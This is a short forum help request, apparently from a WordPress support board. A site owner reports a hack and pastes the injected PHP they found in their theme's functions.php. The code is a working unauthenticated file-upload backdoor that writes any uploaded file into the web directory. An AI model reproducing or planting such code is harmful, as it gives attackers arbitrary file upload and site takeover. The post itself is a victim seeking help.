Website hacked with file upload widget?

  • The other day,I noticed that one of my sites had a random file upload widget on all of its pages. I try to log into my dashboard and the login page is blank white, except for the file upload widget bar that sits on the top of the page.

    I go into my ftp and I see this in my functions.php:

    <?php
if(isset($_POST['Submit'])){
    $filedir = "";
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);

echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
}
?>

    Has anyone dealt with this problem before? If so, what’s the best course of action to get rid of the problem? Unfortunately, I did not backup my site.

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • The topic ‘Website hacked with file upload widget?’ is closed to new replies.